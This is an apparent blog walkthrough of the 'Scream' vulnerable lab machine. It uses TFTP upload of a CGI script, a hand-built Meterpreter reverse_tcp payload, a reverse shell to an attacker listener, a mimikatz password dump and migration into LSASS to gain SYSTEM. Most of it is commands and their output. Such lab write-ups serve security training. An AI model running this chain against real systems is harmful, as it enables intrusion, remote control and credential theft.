published on in writeup
tags: scream

Scream - Method 2 (Longer/Harder)

FTP

As we can see from the original Nmap scan in Method 1, there is an FTP service which allows anonymous read access to part of the file system. Peeking inside the bin and root folders, gives us a good indication that this where the TinyWeb service is running, however we have no write access.

TFTP

A UDP Nmap scan showed the port 69 (TFTP) may be open.

[email protected]:~# nmap -n -sU -sV 192.168.127.130
69/udp open  tftp?
1 service unrecognized despite returning data.

The problem with TFTP is there is no way to know which remote directory the service is bound to, and we therefore have no idea where the files are going to go. I created a very basic HTML page and uploaded it via TFTP.

Using the web service and the FTP access, I could confirm the file was written to the root folder.

[email protected]:~# vi test.html
<html>
<body>
<p>This is a test.</p>
</body>
</html>

[email protected]:~# tftp 192.168.127.130
tftp> put test.html
Sent 58 bytes in 0.0 seconds

[email protected]:~# ftp 192.168.127.130
ftp> ls root
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp              0 Feb 08  2013 cgi-bin
---------- 1 ftp ftp          14539 Oct 31  2012 index.html
---------- 1 ftp ftp             63 May 16 13:56 test.html

TinyWeb CGI

I went and downloaded TinyWeb from RITLabs and found that within their download package, they had some example files for CGI applications.

I uploaded a few of these to the cgi-bin folder via TFTP and execucated them via cURL.

[email protected]:~# cp scream/tinyweb/cgi/HELLO.PL /root/hello.pl

[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/hello.pl
Sent 330 bytes in 0.0 seconds

[email protected]:~# curl http://192.168.127.130/cgi-bin/hello.pl
Hello, World!

The next test was to see if I could upload a CGI script that would run an executable (i.e. a Meterpreter payload…).

[email protected]:~# cp scream/tinyweb/cgi/helloexe.pl /root/exploit.pl
change line --> print `exploit.exe`;

Payload

Now to make the exploit, but there’s an added complication. I found that normal PE32 executables created by msfpayload would not execute on the remote host, and if you examine the doscgi.exe file (in the cgi examples in the tinyweb download) you can see it’s an MS-DOS executable.

There’s no option in msfpayload or msfencode to do this as far as I can tell, so it has to be done manually.

The first stage is to produce a raw payload.

[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.127.127 R > exploit_raw

Then convert this into ASM format using Disassemble Ruby library.

[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb /root/exploit_raw > /root/exploit_asm

There are two lines we have to manually add to the top of this file.

[email protected]:~# vi exploit_asm 
.section '.text' rwx
.entrypoint

Then finally encode this into the final executable.

[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/peencode.rb /root/exploit_asm
saved to file "a.out"

[email protected]:~# mv a.out /root/exploit.exe

[email protected]:~# file exploit.exe
exploit.exe: MS-DOS executable, MZ for MS-DOS

Upload and Execute

Upload these two files via TFTP, then start the Metasploit Multi Hander.

[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/exploit.pl
Sent 538 bytes in 0.0 seconds
tftp> put cgi-bin/exploit.exe
Sent 1028 bytes in 0.0 seconds

[email protected]:~# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.127.127 E

I then used cURL to execute the CGI script, which in turn executes the exe.

[email protected]:~# curl http://192.168.127.130/cgi-bin/exploit.pl
[*] Sending stage (769536 bytes) to 192.168.127.130
[*] Meterpreter session 1 opened (192.168.127.127:4444 -> 192.168.127.130:1034)

Post Exploitation

meterpreter > getuid
Server username: SCREAM\alex

Unlike in the previous method, where the SSH service was running as SYSTEM, the TinyWeb service is running as user alex. This means that some privilege escalation is now required.

First I loaded the Mimikaz extension, to find alex’s password stored in memory. This wasn’t really necessary, as there aren’t any other services which I can authenticate to. I just did it for the sake of completeness.

meterpreter > load mimikatz 
meterpreter > wdigest
0;34668  NTLM       SCREAM        alex             thisisaverylongpassword

All that’s required to elevate is to migrate the Meterpreter service into a process running as SYSTEM. I attempted to migrate into 644 LSASS.

meterpreter > migrate 664
[*] Migrating from 3272 to 664...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM